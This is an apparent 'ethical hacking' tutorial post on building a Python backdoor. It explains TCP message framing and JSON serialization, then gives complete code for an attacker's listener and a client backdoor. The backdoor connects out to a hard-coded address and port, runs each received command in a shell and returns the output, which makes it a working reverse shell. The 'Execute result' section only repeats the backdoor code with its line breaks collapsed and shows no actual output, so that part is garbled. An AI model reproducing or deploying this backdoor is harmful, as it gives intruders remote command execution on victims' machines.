Python Ethical Hacking - BACKDOORS(3)

BACKDOORS Sockets

Problem:

• TCP is stream-based.
• Difficult to identify the end of message/batch.

Solution:

• Make sure the message is well defined.
• Implement a protocol that sends and receives methods conform to.
  • Send the size of the message as a header.
  • Append an end-of-message mark to the end of each message.
  • Serialize the message.

BACKDOORS Serialization

Benefits:

• Message is well defined, receiver knows if message is incomplete.
• Can be used to transfer objects(lists, dicts ...etc)

Implementation:

• JSON and Pickle are common solutions.
• JSON(Javascript Object Notation) is implemented in many programming languages.
• Represents objects as text.
• Widely used when transferring data between clients and servers.

 Server Side - Listener Code:

#!/usr/bin/env python
import socket
import json


class Listener:
    def __init__(self, ip, port):
        listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        listener.bind((ip, port))
        listener.listen(0)
        print("[+] Waiting for incoming connections")
        self.connection, address = listener.accept()
        print("[+] Got a connection from " + str(address))

    def reliable_send(self, data):
        json_data = json.dumps(data).encode()
        self.connection.send(json_data)

    def reliable_receive(self):
        json_data = ""
        while True:
            try:
                json_data = json_data + self.connection.recv(1024).decode()
                return json.loads(json_data)
            except ValueError:
                continue

    def execute_remotely(self, command):
        self.reliable_send(command.decode())
        return self.reliable_receive()

    def run(self):
        while True:
            command = input(">> ").encode()
            result = self.execute_remotely(command)
            print(result)


my_listener = Listener("10.0.0.43", 4444)
my_listener.run()

Client Side - Backdoor code:

#!/usr/bin/env python
import json
import socket
import subprocess


class Backdoor:
    def __init__(self, ip, port):
        self.connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.connection.connect((ip, port))

    def reliable_send(self, data):
        json_data = json.dumps(data).encode()
        self.connection.send(json_data)

    def reliable_receive(self):
        json_data = ""
        while True:
            try:
                json_data = json_data + self.connection.recv(1024).decode()
                return json.loads(json_data)
            except ValueError:
                continue

    def execute_system_command(self, command):
        return subprocess.check_output(command, shell=True)

    def run(self):
        while True:
            command = self.reliable_receive()
            command_result = self.execute_system_command(command)
            self.reliable_send(command_result.decode())
        connection.close()


my_backdoor = Backdoor("10.0.0.43", 4444)
my_backdoor.run()

Execute result:

#!/usr/bin/env pythonimport jsonimport socketimport subprocessclass Backdoor:    def __init__(self, ip, port):        self.connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)        self.connection.connect((ip, port))    def reliable_send(self, data):        json_data = json.dumps(data).encode()        self.connection.send(json_data)    def reliable_receive(self):        json_data = ""        while True:            try:                json_data = json_data + self.connection.recv(1024).decode()                return json.loads(json_data)            except ValueError:                continue    def execute_system_command(self, command):        return subprocess.check_output(command, shell=True)    def run(self):        while True:            command = self.reliable_receive()            command_result = self.execute_system_command(command)            self.reliable_send(command_result.decode())        connection.close()my_backdoor = Backdoor("10.0.0.43", 4444)my_backdoor.run()